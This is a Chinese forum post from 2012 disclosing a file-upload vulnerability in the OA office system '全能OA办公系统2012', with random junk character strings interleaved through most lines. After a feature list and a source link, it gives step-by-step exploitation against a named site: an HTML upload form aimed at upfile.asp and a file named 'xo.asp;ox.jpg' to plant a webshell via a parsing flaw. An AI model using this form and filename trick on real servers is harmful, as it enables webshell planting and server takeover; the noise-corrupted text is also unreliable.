全能OA办公系统 上传漏洞
6 e @8 H0 H4 _# e) I8 {2 `: ~+ P
系统介绍:, }8 _9 D1 C7 M- w( U; w+ s
; d& [$ ~% p, {0 N) P7 c全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
5 `6 ^& Z5 f* s) x) J
" q L8 E L, s主要功能:
& C" B3 A ^9 E3 e' c5 K公司通告
' T9 E& \5 S1 S" d- l& @6 L3 m工作计划
+ W+ Z z4 {* V( q, \通讯助理 5 a" N# v7 Y8 U7 V
客户资源 ; h6 M9 q1 u2 v. ^' g
我的公文 + n" t4 l: r' h. f6 g+ h" v
公文传阅
- ~) b2 q7 f" w7 b* ]公共资源
4 T5 K) |, ^- t' j资源预约 R5 V7 W: k: _, E$ r
今日考勤
3 E) \, j/ i0 L9 V1 ^, [ D! r. z个人计划 - i4 t% u F' L+ U9 B6 ~+ Z( q
个人通讯录
4 p+ ~* B: e i0 g3 `4 [# U u个人基本档案 ) s( ~, V) G# v T/ ^
未读邮件
+ a* U1 g/ I& {6 s2 z发邮件
0 q* z' r4 b3 }% X: A收件夹 % Q9 h$ l0 d# V& A. H$ Q
寄件夹 ( G# ~) s2 \0 d0 D
网络硬盘
J; j$ ^9 p0 o6 R1 @7 J网络会议 3 x( A" A6 A( F% s
网络调查 3 I7 n% F5 X* o, n4 h; @
交流论坛
9 {, w9 _4 z; O# _) V; A/ |+ p F* m; W# h& i% y8 q, f
有兴趣测试的朋友可以下源码看看
' F7 P6 y3 Z6 W# { K# T2 b8 t6 j3 [5 _
源码下载:
# m( x8 H1 ~& p/ l9 o- P5 Q/ g; H4 H3 Q6 R8 g/ P
http://www.mycodes.net/30/4750.htm
5 W% n( @) U( X/ M: U
; `6 h+ E4 g1 X, p! M8 t7 _7 |漏洞介绍:& j; ~$ ?& a) A- N
' ?" _7 ~: q3 {2 @3 _
由upfile.asp上传文件漏洞引起" Q1 B A, q; V g2 q0 g
; u+ N& i4 E4 h. Z g% c
测试方法:
/ X9 B$ K$ \. f! S( O, Z
2 `: T) x' a* E1 V6 }7 V2 `使用名小子上传http://www.itlynn.com/upfile.asp即可0 T a. U% |# W' F! {. [
9 @7 Y3 Q; I4 P; Y, d( R
如果upfile.asp文件被删除不存在。4 [+ B4 g) Z; }" ^) t
4 g+ P' O7 @' N 那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。
! T5 T9 X" @! x; K8 u2 Z8 H2 G- m, }! L( i* r7 G" e
如果存在那么将如下代码保存为upfile.html。" V: `1 {5 c- j
5 G1 K0 t9 z5 n5 a3 H. A7 V0 V w
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。
- Q. J+ u8 m/ [6 D: a1 D
' o9 z W b0 {8 w0 g
+ G+ J& v2 S3 a. L3 r
( Q Y: ?# P. @! u+ o2 S01 <table border='0' align="center" cellpadding="5">
6 t+ r4 @' C- a! d n: m, V
, W; H9 X. a" S7 z02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1"> . k( D1 |. O1 y" H+ R5 r, Q
. u. _9 c1 p/ ~. {* ~( x" v
03 <tr>
# p% @' j& G, F: B1 C! ^4 z
2 L( I, ^5 c }4 a04 <td>报错:</td>
9 ]7 H5 h9 d% \% V
4 y( r% u) `# {: c w: J1 N. \05 <td><input type='radio' name='errnumber' value='0'> " A1 x. @% k& I
" `- s3 @; ^/ `+ O3 H: Z3 P" _/ I06 自动更名 - b5 k: Y: ]4 ?
) K' g1 x" b9 n07 <input type='radio' name='errnumber' value='1' checked>
! w+ l7 x8 p- B+ l. S- a: N/ _3 I( Z
08 报错方式 / T+ v. ]0 E7 i
+ t' T4 d# s- n8 N. a, D7 R
09 <input type='radio' name='errnumber' value='2'>
' o- i. ~/ K$ E) C. v! W5 P9 V2 ~% I" W! A% t
10 直接覆盖</td>
/ e: [, [9 J' y7 X9 p
+ C+ O: ?. ?& o0 L5 M) L11 </tr> 8 }! c+ O0 j# [8 x- Z
: \6 N3 x5 N$ m3 x- k* T& Z2 i
12 <tr>
) I* h( k2 L, { q
: T9 x/ Y. }3 Y' E7 o; i7 s13 <td>主题:</td> , f0 V1 T; m- Z
! A, N8 u% j/ c: R/ K }0 B4 O' o
14 <td><input type='text' name='filename' size='30'></td>
. ]1 I5 ]% _7 Y/ A u. S. J+ q# K/ M
15 </tr> ; _' p1 h q% n# E" }- `. R5 d, m& [4 `! `
8 K; I$ k; e& K: M2 I16 <tr>
2 C9 i. @, i' t; v& G6 K; l* T" ?
17 <td>文件:</td> 0 e( d5 {9 O5 }+ G
& h8 I3 A9 i5 o9 @5 [
18 <td><input type="file"name="fruit"size="30"></td>
" a/ ~" _9 x, w4 c5 c1 t( L
9 c( R9 H; G( c0 |9 t4 ^" X19 </tr>
7 A5 n/ r! A" T6 q& L
|% m3 [/ g- [$ f+ c20 <tr>
- F4 u1 F& V) {5 A7 H
$ a' P8 _8 B- C' U. J21 <td valign='top'>简介:</td>
1 F% A* @9 P+ q- t4 C
- b5 _1 f/ f0 v4 K6 S' }22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
2 P: m6 j* c1 o4 t! k0 T- _1 N6 b; L' s5 J7 z' n% j9 ^+ C. A7 z
23 </tr>
1 S6 X1 Z7 @) F2 [7 ]) }
* x* G$ k3 R. W& _0 A6 A0 f24
: {! i5 Q* ^* m6 g4 p( }+ U- p
4 S5 |, w/ q% K( }9 F' r: j& K25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
( G! a. T1 O% R7 N W" ^0 p
- V6 w. ^% n9 h1 z+ |! i) @ [. Q3 H) @26 </tr> 5 H% z7 e5 P* C3 E. \9 a% h4 j
+ L B: C1 g0 z+ V! q
27 </form> y7 [0 o5 o8 \2 d: T* p
; A! U& R) O4 q6 g然后打开上传一个文件名为xo.asp;ox.jpg的文件。
) ?5 F' B0 s1 c/ d
- r& d c$ q% O0 M* @# b4 k
$ F: n( }$ a( \4 e u
; Y& Z9 T: i$ i* y上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg7 j2 B+ U5 w( _) Z8 z
. U, V* w) L& Q( j4 W: b# r- Y此漏洞需要配合解析漏洞利用。, q: J9 e# g- b0 E$ D+ B( d; c4 C2 ?
4 S9 v& ]' [, s( m1 u
|
发表于 2012-11-21 13:45:12
收藏
支持
反对